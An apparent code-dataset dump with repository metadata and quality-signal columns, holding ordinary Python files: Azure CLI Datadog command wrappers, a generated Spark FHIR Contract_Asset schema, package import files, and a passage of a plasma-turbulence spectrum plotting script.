hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0cf4b2fc1023f5b2635c4bf77ebb83560d77cd89
| 68
|
py
|
Python
|
medical_seg/evaluation/__init__.py
|
920232796/MedicalSeg
|
385ed000c04d828133faeaa9a56ba14488adc8c5
|
[
"Apache-2.0"
] | 11
|
2021-08-23T13:06:59.000Z
|
2022-03-14T09:05:34.000Z
|
medical_seg/evaluation/__init__.py
|
920232796/MedicalSeg
|
385ed000c04d828133faeaa9a56ba14488adc8c5
|
[
"Apache-2.0"
] | null | null | null |
medical_seg/evaluation/__init__.py
|
920232796/MedicalSeg
|
385ed000c04d828133faeaa9a56ba14488adc8c5
|
[
"Apache-2.0"
] | 2
|
2022-01-12T07:58:44.000Z
|
2022-03-15T04:48:57.000Z
|
from .evaluation import *
from .brats import *
from .helper import *
| 22.666667
| 25
| 0.75
| 9
| 68
| 5.666667
| 0.555556
| 0.392157
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.161765
| 68
| 3
| 26
| 22.666667
| 0.894737
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
0b2d9333c1e09a663b3dd44e7429b7a31aa0d4d4
| 9,923
|
py
|
Python
|
src/datadog/azext_datadog/generated/custom.py
|
limingu/azure-cli-extensions
|
1bc29f089f4da42ab8905e440f2f46d6b5b0aa97
|
[
"MIT"
] | null | null | null |
src/datadog/azext_datadog/generated/custom.py
|
limingu/azure-cli-extensions
|
1bc29f089f4da42ab8905e440f2f46d6b5b0aa97
|
[
"MIT"
] | 1
|
2020-07-13T22:08:43.000Z
|
2020-07-13T22:08:43.000Z
|
src/datadog/azext_datadog/generated/custom.py
|
limingu/azure-cli-extensions
|
1bc29f089f4da42ab8905e440f2f46d6b5b0aa97
|
[
"MIT"
] | null | null | null |
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
# pylint: disable=too-many-lines
# pylint: disable=unused-argument
from azure.cli.core.util import sdk_no_wait
def datadog_terms_list(client):
return client.list()
def datadog_api_key_list(client,
resource_group_name,
monitor_name):
return client.list(resource_group_name=resource_group_name,
monitor_name=monitor_name)
def datadog_api_key_get_default_key(client,
resource_group_name,
monitor_name):
return client.get_default_key(resource_group_name=resource_group_name,
monitor_name=monitor_name)
def datadog_api_key_set_default_key(client,
resource_group_name,
monitor_name,
key,
created_by=None,
name=None,
created=None):
return client.set_default_key(resource_group_name=resource_group_name,
monitor_name=monitor_name,
created_by=created_by,
name=name,
key=key,
created=created)
def datadog_host_list(client,
resource_group_name,
monitor_name):
return client.list(resource_group_name=resource_group_name,
monitor_name=monitor_name)
def datadog_linked_resource_list(client,
resource_group_name,
monitor_name):
return client.list(resource_group_name=resource_group_name,
monitor_name=monitor_name)
def datadog_monitored_resource_list(client,
resource_group_name,
monitor_name):
return client.list(resource_group_name=resource_group_name,
monitor_name=monitor_name)
def datadog_monitor_list(client,
resource_group_name=None):
if resource_group_name:
return client.list_by_resource_group(resource_group_name=resource_group_name)
return client.list()
def datadog_monitor_show(client,
resource_group_name,
monitor_name):
return client.get(resource_group_name=resource_group_name,
monitor_name=monitor_name)
def datadog_monitor_create(client,
resource_group_name,
monitor_name,
location,
tags=None,
identity_type=None,
provisioning_state=None,
monitoring_status=None,
marketplace_subscription_status=None,
datadog_organization_properties=None,
user_info=None,
sku_name=None,
no_wait=False):
return sdk_no_wait(no_wait,
client.begin_create,
resource_group_name=resource_group_name,
monitor_name=monitor_name,
tags=tags,
location=location,
type=identity_type,
provisioning_state=provisioning_state,
monitoring_status=monitoring_status,
marketplace_subscription_status=marketplace_subscription_status,
datadog_organization_properties=datadog_organization_properties,
user_info=user_info,
name=sku_name)
def datadog_monitor_update(client,
resource_group_name,
monitor_name,
tags=None,
monitoring_status=None):
return client.update(resource_group_name=resource_group_name,
monitor_name=monitor_name,
tags=tags,
monitoring_status=monitoring_status)
def datadog_monitor_delete(client,
resource_group_name,
monitor_name,
no_wait=False):
return sdk_no_wait(no_wait,
client.begin_delete,
resource_group_name=resource_group_name,
monitor_name=monitor_name)
def datadog_refresh_set_password_get(client,
resource_group_name,
monitor_name):
return client.get(resource_group_name=resource_group_name,
monitor_name=monitor_name)
def datadog_tag_rule_list(client,
resource_group_name,
monitor_name):
return client.list(resource_group_name=resource_group_name,
monitor_name=monitor_name)
def datadog_tag_rule_show(client,
resource_group_name,
monitor_name,
rule_set_name):
return client.get(resource_group_name=resource_group_name,
monitor_name=monitor_name,
rule_set_name=rule_set_name)
def datadog_tag_rule_create(client,
resource_group_name,
monitor_name,
rule_set_name,
metric_rules_filtering_tags=None,
log_rules_send_aad_logs=None,
log_rules_send_subscription_logs=None,
log_rules_send_resource_logs=None,
log_rules_filtering_tags=None):
return client.create_or_update(resource_group_name=resource_group_name,
monitor_name=monitor_name,
rule_set_name=rule_set_name,
filtering_tags=metric_rules_filtering_tags,
send_aad_logs=log_rules_send_aad_logs,
send_subscription_logs=log_rules_send_subscription_logs,
send_resource_logs=log_rules_send_resource_logs,
log_rules_filtering_tags=log_rules_filtering_tags)
def datadog_tag_rule_update(client,
resource_group_name,
monitor_name,
rule_set_name,
metric_rules_filtering_tags=None,
log_rules_send_aad_logs=None,
log_rules_send_subscription_logs=None,
log_rules_send_resource_logs=None,
log_rules_filtering_tags=None):
return client.create_or_update(resource_group_name=resource_group_name,
monitor_name=monitor_name,
rule_set_name=rule_set_name,
filtering_tags=metric_rules_filtering_tags,
send_aad_logs=log_rules_send_aad_logs,
send_subscription_logs=log_rules_send_subscription_logs,
send_resource_logs=log_rules_send_resource_logs,
log_rules_filtering_tags=log_rules_filtering_tags)
def datadog_single_sign_on_configuration_list(client,
resource_group_name,
monitor_name):
return client.list(resource_group_name=resource_group_name,
monitor_name=monitor_name)
def datadog_single_sign_on_configuration_show(client,
resource_group_name,
monitor_name,
configuration_name):
return client.get(resource_group_name=resource_group_name,
monitor_name=monitor_name,
configuration_name=configuration_name)
def datadog_single_sign_on_configuration_create(client,
resource_group_name,
monitor_name,
configuration_name,
properties=None,
no_wait=False):
return sdk_no_wait(no_wait,
client.begin_create_or_update,
resource_group_name=resource_group_name,
monitor_name=monitor_name,
configuration_name=configuration_name,
properties=properties)
def datadog_single_sign_on_configuration_update(instance,
resource_group_name,
monitor_name,
configuration_name,
no_wait=False):
return instance
| 43.143478
| 91
| 0.508616
| 857
| 9,923
| 5.3979
| 0.129522
| 0.168612
| 0.216818
| 0.191959
| 0.760052
| 0.739083
| 0.700821
| 0.654345
| 0.621487
| 0.602032
| 0
| 0
| 0.437569
| 9,923
| 229
| 92
| 43.331878
| 0.828884
| 0.05059
| 0
| 0.628571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.12
| false
| 0.005714
| 0.005714
| 0.114286
| 0.251429
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 6
|
0b43f229ad21d445524c4cd3e40e316618b30621
| 22,847
|
py
|
Python
|
spark_fhir_schemas/r4/complex_types/contract_asset.py
|
icanbwell/SparkFhirSchemas
|
8c828313c39850b65f8676e67f526ee92b7d624e
|
[
"Apache-2.0"
] | null | null | null |
spark_fhir_schemas/r4/complex_types/contract_asset.py
|
icanbwell/SparkFhirSchemas
|
8c828313c39850b65f8676e67f526ee92b7d624e
|
[
"Apache-2.0"
] | null | null | null |
spark_fhir_schemas/r4/complex_types/contract_asset.py
|
icanbwell/SparkFhirSchemas
|
8c828313c39850b65f8676e67f526ee92b7d624e
|
[
"Apache-2.0"
] | null | null | null |
from typing import Union, List, Optional
from pyspark.sql.types import StructType, StructField, StringType, ArrayType, DataType
# This file is auto-generated by generate_schema so do not edit it manually
# noinspection PyPep8Naming
class Contract_AssetSchema:
"""
Legally enforceable, formally recorded unilateral or bilateral directive i.e.,
a policy or agreement.
"""
# noinspection PyDefaultArgument
@staticmethod
def get_schema(
max_nesting_depth: Optional[int] = 6,
nesting_depth: int = 0,
nesting_list: List[str] = [],
max_recursion_limit: Optional[int] = 2,
include_extension: Optional[bool] = False,
extension_fields: Optional[List[str]] = None,
extension_depth: int = 0,
max_extension_depth: Optional[int] = 2,
include_modifierExtension: Optional[bool] = False,
use_date_for: Optional[List[str]] = None,
parent_path: Optional[str] = "",
) -> Union[StructType, DataType]:
"""
Legally enforceable, formally recorded unilateral or bilateral directive i.e.,
a policy or agreement.
id: Unique id for the element within a resource (for internal references). This
may be any string value that does not contain spaces.
extension: May be used to represent additional information that is not part of the basic
definition of the element. To make the use of extensions safe and manageable,
there is a strict set of governance applied to the definition and use of
extensions. Though any implementer can define an extension, there is a set of
requirements that SHALL be met as part of the definition of the extension.
modifierExtension: May be used to represent additional information that is not part of the basic
definition of the element and that modifies the understanding of the element
in which it is contained and/or the understanding of the containing element's
descendants. Usually modifier elements provide negation or qualification. To
make the use of extensions safe and manageable, there is a strict set of
governance applied to the definition and use of extensions. Though any
implementer can define an extension, there is a set of requirements that SHALL
be met as part of the definition of the extension. Applications processing a
resource are required to check for modifier extensions.
Modifier extensions SHALL NOT change the meaning of any elements on Resource
or DomainResource (including cannot change the meaning of modifierExtension
itself).
scope: Differentiates the kind of the asset .
type: Target entity type about which the term may be concerned.
typeReference: Associated entities.
subtype: May be a subtype or part of an offered asset.
relationship: Specifies the applicability of the term to an asset resource instance, and
instances it refers to orinstances that refer to it, and/or are owned by the
offeree.
context: Circumstance of the asset.
condition: Description of the quality and completeness of the asset that imay be a factor
in its valuation.
periodType: Type of Asset availability for use or ownership.
period: Asset relevant contractual time period.
usePeriod: Time period of asset use.
text: Clause or question text (Prose Object) concerning the asset in a linked form,
such as a QuestionnaireResponse used in the formation of the contract.
linkId: Id [identifier??] of the clause or question text about the asset in the
referenced form or QuestionnaireResponse.
answer: Response to assets.
securityLabelNumber: Security labels that protects the asset.
valuedItem: Contract Valued Item List.
"""
if extension_fields is None:
extension_fields = [
"valueBoolean",
"valueCode",
"valueDate",
"valueDateTime",
"valueDecimal",
"valueId",
"valueInteger",
"valuePositiveInt",
"valueString",
"valueTime",
"valueUnsignedInt",
"valueUri",
"valueUrl",
"valueReference",
"valueCodeableConcept",
"valueAddress",
]
from spark_fhir_schemas.r4.complex_types.extension import ExtensionSchema
from spark_fhir_schemas.r4.complex_types.codeableconcept import (
CodeableConceptSchema,
)
from spark_fhir_schemas.r4.complex_types.reference import ReferenceSchema
from spark_fhir_schemas.r4.complex_types.coding import CodingSchema
from spark_fhir_schemas.r4.complex_types.contract_context import (
Contract_ContextSchema,
)
from spark_fhir_schemas.r4.complex_types.period import PeriodSchema
from spark_fhir_schemas.r4.complex_types.contract_answer import (
Contract_AnswerSchema,
)
from spark_fhir_schemas.r4.simple_types.unsignedint import unsignedIntSchema
from spark_fhir_schemas.r4.complex_types.contract_valueditem import (
Contract_ValuedItemSchema,
)
if (
max_recursion_limit
and nesting_list.count("Contract_Asset") >= max_recursion_limit
) or (max_nesting_depth and nesting_depth >= max_nesting_depth):
return StructType([StructField("id", StringType(), True)])
# add my name to recursion list for later
my_nesting_list: List[str] = nesting_list + ["Contract_Asset"]
my_parent_path = (
parent_path + ".contract_asset" if parent_path else "contract_asset"
)
schema = StructType(
[
# Unique id for the element within a resource (for internal references). This
# may be any string value that does not contain spaces.
StructField("id", StringType(), True),
# May be used to represent additional information that is not part of the basic
# definition of the element. To make the use of extensions safe and manageable,
# there is a strict set of governance applied to the definition and use of
# extensions. Though any implementer can define an extension, there is a set of
# requirements that SHALL be met as part of the definition of the extension.
StructField(
"extension",
ArrayType(
ExtensionSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path,
)
),
True,
),
# May be used to represent additional information that is not part of the basic
# definition of the element and that modifies the understanding of the element
# in which it is contained and/or the understanding of the containing element's
# descendants. Usually modifier elements provide negation or qualification. To
# make the use of extensions safe and manageable, there is a strict set of
# governance applied to the definition and use of extensions. Though any
# implementer can define an extension, there is a set of requirements that SHALL
# be met as part of the definition of the extension. Applications processing a
# resource are required to check for modifier extensions.
#
# Modifier extensions SHALL NOT change the meaning of any elements on Resource
# or DomainResource (including cannot change the meaning of modifierExtension
# itself).
StructField(
"modifierExtension",
ArrayType(
ExtensionSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path,
)
),
True,
),
# Differentiates the kind of the asset .
StructField(
"scope",
CodeableConceptSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path,
),
True,
),
# Target entity type about which the term may be concerned.
StructField(
"type",
ArrayType(
CodeableConceptSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path,
)
),
True,
),
# Associated entities.
StructField(
"typeReference",
ArrayType(
ReferenceSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path,
)
),
True,
),
# May be a subtype or part of an offered asset.
StructField(
"subtype",
ArrayType(
CodeableConceptSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path,
)
),
True,
),
# Specifies the applicability of the term to an asset resource instance, and
# instances it refers to orinstances that refer to it, and/or are owned by the
# offeree.
StructField(
"relationship",
CodingSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path,
),
True,
),
# Circumstance of the asset.
StructField(
"context",
ArrayType(
Contract_ContextSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path,
)
),
True,
),
# Description of the quality and completeness of the asset that imay be a factor
# in its valuation.
StructField("condition", StringType(), True),
# Type of Asset availability for use or ownership.
StructField(
"periodType",
ArrayType(
CodeableConceptSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path,
)
),
True,
),
# Asset relevant contractual time period.
StructField(
"period",
ArrayType(
PeriodSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path,
)
),
True,
),
# Time period of asset use.
StructField(
"usePeriod",
ArrayType(
PeriodSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path,
)
),
True,
),
# Clause or question text (Prose Object) concerning the asset in a linked form,
# such as a QuestionnaireResponse used in the formation of the contract.
StructField("text", StringType(), True),
# Id [identifier??] of the clause or question text about the asset in the
# referenced form or QuestionnaireResponse.
StructField("linkId", ArrayType(StringType()), True),
# Response to assets.
StructField(
"answer",
ArrayType(
Contract_AnswerSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path,
)
),
True,
),
# Security labels that protects the asset.
StructField(
"securityLabelNumber",
ArrayType(
unsignedIntSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path,
)
),
True,
),
# Contract Valued Item List.
StructField(
"valuedItem",
ArrayType(
Contract_ValuedItemSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path,
)
),
True,
),
]
)
if not include_extension:
schema.fields = [
c
if c.name != "extension"
else StructField("extension", StringType(), True)
for c in schema.fields
]
if not include_modifierExtension:
schema.fields = [
c
if c.name != "modifierExtension"
else StructField("modifierExtension", StringType(), True)
for c in schema.fields
]
return schema
| 48.922912
| 104
| 0.528603
| 1,995
| 22,847
| 5.782456
| 0.128321
| 0.063454
| 0.040309
| 0.058252
| 0.792129
| 0.776439
| 0.761703
| 0.741418
| 0.723561
| 0.723561
| 0
| 0.002376
| 0.428853
| 22,847
| 466
| 105
| 49.027897
| 0.881677
| 0.226813
| 0
| 0.674352
| 1
| 0
| 0.026307
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.002882
| false
| 0
| 0.0317
| 0
| 0.043228
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
0b54bd198fe5b1a5eff5d844bd1b529b5f73b085
| 281
|
py
|
Python
|
models/__init__.py
|
LostInBrittany/experts-app-backend
|
d62a34456e5e876365eee91f1de2e03a3d74827c
|
[
"Apache-2.0"
] | 10
|
2015-10-02T07:35:47.000Z
|
2021-09-08T18:28:13.000Z
|
models/__init__.py
|
LostInBrittany/experts-app-backend
|
d62a34456e5e876365eee91f1de2e03a3d74827c
|
[
"Apache-2.0"
] | 34
|
2015-07-04T20:16:18.000Z
|
2018-04-22T03:11:08.000Z
|
models/__init__.py
|
LostInBrittany/experts-app-backend
|
d62a34456e5e876365eee91f1de2e03a3d74827c
|
[
"Apache-2.0"
] | 5
|
2015-12-17T15:02:09.000Z
|
2022-01-14T18:47:48.000Z
|
from .activity_post import ActivityPost
from .activity_record import ActivityRecord
from .activity_record import ActivityMetaData
from .account import Account
from .activity_type import ActivityType
from .product_group import ProductGroup
from .activity_group import ActivityGroup
| 35.125
| 45
| 0.875445
| 34
| 281
| 7.058824
| 0.441176
| 0.25
| 0.15
| 0.2
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.099644
| 281
| 7
| 46
| 40.142857
| 0.948617
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
0b88502ee31354abb821f307fb66aed3a7fd21b4
| 19,374
|
py
|
Python
|
diagnostics/RRMHD/plot_kspectrum.py
|
ykawazura/calliope
|
343b72a0930d70332172a5d87a579b0f8dcced66
|
[
"MIT"
] | 2
|
2022-02-04T19:27:11.000Z
|
2022-02-05T05:37:38.000Z
|
diagnostics/RRMHD/plot_kspectrum.py
|
ykawazura/calliope
|
343b72a0930d70332172a5d87a579b0f8dcced66
|
[
"MIT"
] | null | null | null |
diagnostics/RRMHD/plot_kspectrum.py
|
ykawazura/calliope
|
343b72a0930d70332172a5d87a579b0f8dcced66
|
[
"MIT"
] | 2
|
2022-02-03T10:45:48.000Z
|
2022-02-03T10:48:28.000Z
|
# -*- coding: utf-8 -*-
# Diagnostic script: plot 1D and 2D wavenumber spectra for an RRMHD run and
# dump them as ascii tables.  Everything it uses -- the binned spectra
# (*_bin), grid info (kpbin, kz, nkz, nlz, is2D, kzlab, tt, final_idx) and
# the helpers (sum_negative_kz2d, plot_log1d_many, plot_log2d) -- comes from
# the star imports below; nothing here is self-contained.
from load import *
from fft import *
from plots import *
print('\nplotting kspectrum\n')
outdir = './fig_kspectrum/'  # all figures and ascii output land here
# Fold the negative-kz half of each (time, kz, kprp) spectrum onto the
# positive-kz half so the kz axis below covers only kz >= 0.
upe2_bin = sum_negative_kz2d(upe2_bin)
bpe2_bin = sum_negative_kz2d(bpe2_bin)
upa2_bin = sum_negative_kz2d(upa2_bin)
bpa2_bin = sum_negative_kz2d(bpa2_bin)
ux2_bin = sum_negative_kz2d(ux2_bin)
uy2_bin = sum_negative_kz2d(uy2_bin)
bx2_bin = sum_negative_kz2d(bx2_bin)
by2_bin = sum_negative_kz2d(by2_bin)
zpep2_bin = sum_negative_kz2d(zpep2_bin)
zpem2_bin = sum_negative_kz2d(zpem2_bin)
zpap2_bin = sum_negative_kz2d(zpap2_bin)
zpam2_bin = sum_negative_kz2d(zpam2_bin)
p_aw_bin = sum_negative_kz2d(p_aw_bin)
p_compr_bin = sum_negative_kz2d(p_compr_bin)
dissip_aw_bin = sum_negative_kz2d(dissip_aw_bin)
dissip_compr_bin = sum_negative_kz2d(dissip_compr_bin)
ntrans_upe_upe_l_bin = sum_negative_kz2d(ntrans_upe_upe_l_bin)
ntrans_bpe_upe_l_bin = sum_negative_kz2d(ntrans_bpe_upe_l_bin)
ntrans_bpe_bpe_l_bin = sum_negative_kz2d(ntrans_bpe_bpe_l_bin)
